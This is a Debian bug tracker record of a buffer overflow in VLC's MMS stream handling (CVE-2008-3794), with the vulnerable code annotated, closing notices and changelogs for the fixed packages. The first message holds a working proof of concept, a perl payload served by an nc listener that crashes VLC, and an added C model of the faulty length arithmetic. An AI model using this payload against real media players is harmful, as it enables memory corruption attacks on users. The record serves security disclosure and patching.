vlc: buffer overflow in mms handling

Related Vulnerabilities: CVE-2008-3794   CVE-2008-3732  

Debian Bug report logs - #496265
vlc: buffer overflow in mms handling

Reported by: Nico Golde <nion@debian.org>

Date: Sun, 24 Aug 2008 00:21:01 UTC

Severity: grave

Tags: security

Found in versions vlc/0.8.6.i-1, vlc/0.8.6.h-1

Fixed in versions vlc/0.8.6.h-4, vlc/0.8.6.i-2, vlc/0.8.6.h-1+lenny1

Done: Steffen Joeris <white@debian.org>

Bug is archived. No further changes may be made.


Report forwarded to debian-bugs-dist@lists.debian.org, Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>:
Bug#496265; Package vlc.


Acknowledgement sent to Nico Golde <nion@debian.org>:
New Bug report received and forwarded. Copy sent to Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>.


Message #5 received at submit@bugs.debian.org:

From: Nico Golde <nion@debian.org>
To: submit@bugs.debian.org
Subject: vlc: buffer overflow in mms handling
Date: Sun, 24 Aug 2008 02:18:02 +0200
Package: vlc
Version: 0.8.6.i-1
Severity: grave
Tags: security

Hi,
the following security issue was published for vlc

static int mms_ReceiveCommand( access_t *p_access )
{
    access_sys_t *p_sys = p_access->p_sys;

    for( ;; )
    {
        int i_used;
        int i_status;

        if( NetFillBuffer( p_access ) < 0 )
        {
            msg_Warn( p_access, "cannot fill buffer" );
            return VLC_EGENERIC;
        }
        if( p_sys->i_buffer_tcp > 0 )
        {
[1]         i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp,
                                         p_sys->i_buffer_tcp, &i_used );
[2]         if( i_used < MMS_BUFFER_SIZE )  
            {
[3]             memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used,
                         MMS_BUFFER_SIZE - i_used );    //BUG! i_used overflow

(...)

[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written

static int  mms_ParseCommand( access_t *p_access,
                              uint8_t *p_data,
                              int i_data,
                              int *pi_used )
(...)
    i_length = GetDWLE( p_data + 8 ) + 16;
(...)
    if( i_length > p_sys->i_cmd )
    {
        msg_Warn( p_access,
                  "truncated command (missing %d bytes)",
                   i_length - i_data  );
        p_sys->i_command = 0;
        return -1;
    }
[1] else if( i_length < p_sys->i_cmd )
    {
        p_sys->i_cmd = i_length;
[2]     *pi_used = i_length;
    }

(...)

[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand

- - Proof of concept -

on localhost:

perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
nc -l -v -p 1755 < headshot 

open this url in VLC:

mmst://127.0.0.1/


I can confirm this issue exists.
Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original advisory.

I'll follow up on this bug report with a CVE id soon.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.

Bug marked as found in version 0.8.6.h-1. Request was from Nico Golde <nion@debian.org> to control@bugs.debian.org. (Sun, 24 Aug 2008 00:27:03 GMT)
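
Added example (not part of the original report or of VLC's source): a small C model of the arithmetic in the excerpt quoted in message #5. It shows how the 12 header bytes from the report become a negative i_used that passes check [2], and how an unsigned length check rejects them. The value of MMS_BUFFER_SIZE, the function names and the hardened check are assumptions made for this demo; the check is not the upstream 407-mms-overflow.diff.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MMS_BUFFER_SIZE 100000   /* assumed size, for this demo only */

/* Constructed inputs: the 12 header bytes quoted in the report, and a
 * well-formed header declaring a 32-byte body. */
static const uint8_t hdr_report[12] = { 'a','a','a','a', 0xce,0xfa,0x0b,0xb0,
                                        0xef,0xff,0xef,0xff };
static const uint8_t hdr_benign[12] = { 'a','a','a','a', 0xce,0xfa,0x0b,0xb0,
                                        0x20,0x00,0x00,0x00 };

/* Little-endian 32-bit read, the role GetDWLE() plays in the excerpt. */
static uint32_t get_dwle(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* The excerpt stores "GetDWLE( p_data + 8 ) + 16" in a signed int, so a
 * wire value with the top bit set comes out negative (two's complement). */
static int32_t length_as_parsed(const uint8_t *hdr)
{
    return (int32_t)(get_dwle(hdr + 8) + 16u);
}

/* Byte count the memmove at [3] would be given for this i_used, or -1 when
 * check [2] skips the move. The source pointer would be
 * buffer_tcp + i_used. Nothing is copied here. */
static long long unchecked_move_count(int32_t i_used)
{
    if (!(i_used < MMS_BUFFER_SIZE))      /* [2]: upper bound only */
        return -1;
    return (long long)MMS_BUFFER_SIZE - i_used;
}

/* Hypothetical hardened variant: validate the length as unsigned, against
 * the bytes actually received, before it is used as an offset.
 * Returns the command length, or -1 if the header is rejected. */
static long long checked_command_length(const uint8_t *buf, size_t avail)
{
    if (avail < 12 || avail > MMS_BUFFER_SIZE)
        return -1;                        /* length field not present */
    uint32_t body = get_dwle(buf + 8);
    if (body > UINT32_MAX - 16u)
        return -1;                        /* body + 16 would wrap */
    if ((unsigned long long)body + 16u > avail)
        return -1;                        /* claims more than received */
    return (long long)body + 16;
}

int main(void)
{
    int32_t len = length_as_parsed(hdr_report);

    printf("parsed length (report header): %d\n", (int)len);
    printf("unchecked memmove count: %lld, buffer size: %d\n",
           unchecked_move_count(len), MMS_BUFFER_SIZE);
    printf("checked length, report header: %lld\n",
           checked_command_length(hdr_report, 112));
    printf("checked length, benign header: %lld\n",
           checked_command_length(hdr_benign, 112));
    return 0;
}
```
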


Reply sent to Christophe Mutricy <xtophe@videolan.org>:
You have taken responsibility.


Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer.


Message #12 received at 496265-close@bugs.debian.org:

From: Christophe Mutricy <xtophe@videolan.org>
To: 496265-close@bugs.debian.org
Subject: Bug#496265: fixed in vlc 0.8.6.h-4
Date: Mon, 25 Aug 2008 12:02:29 +0000
Source: vlc
Source-Version: 0.8.6.h-4

We believe that the bug you reported is fixed in the latest version of
vlc, which is due to be installed in the Debian FTP archive:

libvlc0-dev_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/libvlc0-dev_0.8.6.h-4_i386.deb
libvlc0_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/libvlc0_0.8.6.h-4_i386.deb
mozilla-plugin-vlc_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.h-4_i386.deb
vlc-nox_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-nox_0.8.6.h-4_i386.deb
vlc-plugin-arts_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-arts_0.8.6.h-4_i386.deb
vlc-plugin-esd_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-esd_0.8.6.h-4_i386.deb
vlc-plugin-ggi_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.h-4_i386.deb
vlc-plugin-glide_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-glide_0.8.6.h-4_i386.deb
vlc-plugin-jack_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-jack_0.8.6.h-4_i386.deb
vlc-plugin-sdl_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.h-4_i386.deb
vlc-plugin-svgalib_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.h-4_i386.deb
vlc_0.8.6.h-4.diff.gz
  to pool/main/v/vlc/vlc_0.8.6.h-4.diff.gz
vlc_0.8.6.h-4.dsc
  to pool/main/v/vlc/vlc_0.8.6.h-4.dsc
vlc_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc_0.8.6.h-4_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 496265@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Christophe Mutricy <xtophe@videolan.org> (supplier of updated vlc package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Mon, 25 Aug 2008 01:07:27 +0100
Source: vlc
Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack
Architecture: source i386
Version: 0.8.6.h-4
Distribution: unstable
Urgency: high
Maintainer: Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>
Changed-By: Christophe Mutricy <xtophe@videolan.org>
Description: 
 libvlc0    - multimedia player and streamer library
 libvlc0-dev - development files for VLC
 mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC
 vlc        - multimedia player and streamer
 vlc-nox    - multimedia player and streamer (without X support)
 vlc-plugin-arts - aRts audio output plugin for VLC
 vlc-plugin-esd - Esound audio output plugin for VLC
 vlc-plugin-ggi - GGI video output plugin for VLC
 vlc-plugin-glide - Glide video output plugin for VLC
 vlc-plugin-jack - Jack audio plugins for VLC
 vlc-plugin-sdl - SDL video and audio output plugin for VLC
 vlc-plugin-svgalib - SVGAlib video output plugin for VLC
Closes: 496265
Changes: 
 vlc (0.8.6.h-4) unstable; urgency=high
 .
   * Security: Fix integer overflow in mms module
     (Closes: #496265)(407-mms-overflow.diff taken from upstream)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Debian Powered!

iEYEARECAAYFAkiynk0ACgkQmAg1RJRTSKSm7ACeLYWR5gz5wxY7YF0Ql5/iK3SD
YywAnjMgNxC1/cPzEadaidIevDQoYv58
=NaMd
-----END PGP SIGNATURE-----





Reply sent to Sam Hocevar (Debian packages) <sam+deb@zoy.org>:
You have taken responsibility.


Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer.


Message #17 received at 496265-close@bugs.debian.org:

From: Sam Hocevar (Debian packages) <sam+deb@zoy.org>
To: 496265-close@bugs.debian.org
Subject: Bug#496265: fixed in vlc 0.8.6.i-2
Date: Wed, 27 Aug 2008 09:47:13 +0000
Source: vlc
Source-Version: 0.8.6.i-2

We believe that the bug you reported is fixed in the latest version of
vlc, which is due to be installed in the Debian FTP archive:

libvlc0-dev_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/libvlc0-dev_0.8.6.i-2_amd64.deb
libvlc0_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/libvlc0_0.8.6.i-2_amd64.deb
mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
vlc-nox_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-nox_0.8.6.i-2_amd64.deb
vlc-plugin-arts_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-arts_0.8.6.i-2_amd64.deb
vlc-plugin-esd_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-esd_0.8.6.i-2_amd64.deb
vlc-plugin-ggi_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.i-2_amd64.deb
vlc-plugin-jack_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-jack_0.8.6.i-2_amd64.deb
vlc-plugin-sdl_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.i-2_amd64.deb
vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
vlc_0.8.6.i-2.diff.gz
  to pool/main/v/vlc/vlc_0.8.6.i-2.diff.gz
vlc_0.8.6.i-2.dsc
  to pool/main/v/vlc/vlc_0.8.6.i-2.dsc
vlc_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc_0.8.6.i-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 496265@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sam Hocevar (Debian packages) <sam+deb@zoy.org> (supplier of updated vlc package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Tue, 26 Aug 2008 23:25:13 +0000
Source: vlc
Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack
Architecture: source amd64
Version: 0.8.6.i-2
Distribution: experimental
Urgency: high
Maintainer: Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>
Changed-By: Sam Hocevar (Debian packages) <sam+deb@zoy.org>
Description: 
 libvlc0    - multimedia player and streamer library
 libvlc0-dev - development files for VLC
 mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC
 vlc        - multimedia player and streamer
 vlc-nox    - multimedia player and streamer (without X support)
 vlc-plugin-arts - aRts audio output plugin for VLC
 vlc-plugin-esd - Esound audio output plugin for VLC
 vlc-plugin-ggi - GGI video output plugin for VLC
 vlc-plugin-glide - Glide video output plugin for VLC
 vlc-plugin-jack - Jack audio plugins for VLC
 vlc-plugin-sdl - SDL video and audio output plugin for VLC
 vlc-plugin-svgalib - SVGAlib video output plugin for VLC
Closes: 496265
Changes: 
 vlc (0.8.6.i-2) experimental; urgency=high
 .
   [ Loic Minier ]
   * Fix changelog entries for 0.8.6.h-2 and 0.8.6.h-3.
   * Bump up Standards-Version to 3.8.0.
 .
   [ Christophe Mutricy ]
   * Security: Fix integer overflow in mms module (CVE-2008-3794)
     (Closes: #496265)(407-mms-overflow.diff taken from upstream)
 .
   [ Sam Hocevar ]
   * debian/patches/300_manpage_syntax.diff: fix vlc-config.1 syntax.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEUEARECAAYFAki0m18ACgkQfPP1rylJn2GCNwCXZvEAHX/+GcnmHdxFhm0Vh403
/wCglAPJpSK6Ce84z8zJKFX3onttt4g=
=WsNO
-----END PGP SIGNATURE-----





Reply sent to Steffen Joeris <white@debian.org>:
You have taken responsibility.


Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer.


Message #22 received at 496265-close@bugs.debian.org:

From: Steffen Joeris <white@debian.org>
To: 496265-close@bugs.debian.org
Subject: Bug#496265: fixed in vlc 0.8.6.h-1+lenny1
Date: Mon, 15 Sep 2008 16:17:14 +0000
Source: vlc
Source-Version: 0.8.6.h-1+lenny1

We believe that the bug you reported is fixed in the latest version of
vlc, which is due to be installed in the Debian FTP archive:

libvlc0-dev_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/libvlc0-dev_0.8.6.h-1+lenny1_i386.deb
libvlc0_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/libvlc0_0.8.6.h-1+lenny1_i386.deb
mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb
vlc-nox_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-nox_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb
vlc_0.8.6.h-1+lenny1.diff.gz
  to pool/main/v/vlc/vlc_0.8.6.h-1+lenny1.diff.gz
vlc_0.8.6.h-1+lenny1.dsc
  to pool/main/v/vlc/vlc_0.8.6.h-1+lenny1.dsc
vlc_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc_0.8.6.h-1+lenny1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 496265@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Steffen Joeris <white@debian.org> (supplier of updated vlc package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sun, 14 Sep 2008 11:18:40 +0000
Source: vlc
Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack
Architecture: source i386
Version: 0.8.6.h-1+lenny1
Distribution: testing-security
Urgency: high
Maintainer: Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>
Changed-By: Steffen Joeris <white@debian.org>
Description: 
 libvlc0    - multimedia player and streamer library
 libvlc0-dev - development files for VLC
 mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC
 vlc        - multimedia player and streamer
 vlc-nox    - multimedia player and streamer (without X support)
 vlc-plugin-arts - aRts audio output plugin for VLC
 vlc-plugin-esd - Esound audio output plugin for VLC
 vlc-plugin-ggi - GGI video output plugin for VLC
 vlc-plugin-glide - Glide video output plugin for VLC
 vlc-plugin-jack - Jack audio plugins for VLC
 vlc-plugin-sdl - SDL video and audio output plugin for VLC
 vlc-plugin-svgalib - SVGAlib video output plugin for VLC
Closes: 496265
Changes: 
 vlc (0.8.6.h-1+lenny1) testing-security; urgency=high
 .
   * Non-maintainer upload by the security team
   * Fix integer overflow in the mms module (Closes: #496265)
     Fixes: CVE-2008-3794
   * Fix integer overflow in the TTA module
     Fixes: CVE-2008-3732
   * Change build-depends to libdc1394-22-dev to let it build on lenny

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkjNHHAACgkQ62zWxYk/rQd0ZACfaHpQrS3/LCGqp5S9O5MHxK0X
G3MAoIWZJEDFiW5tr4dI5SeCes+gKYAV
=DAXB
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 14 Oct 2008 07:32:12 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 18:58:41 2019; Machine Name: buxtehude
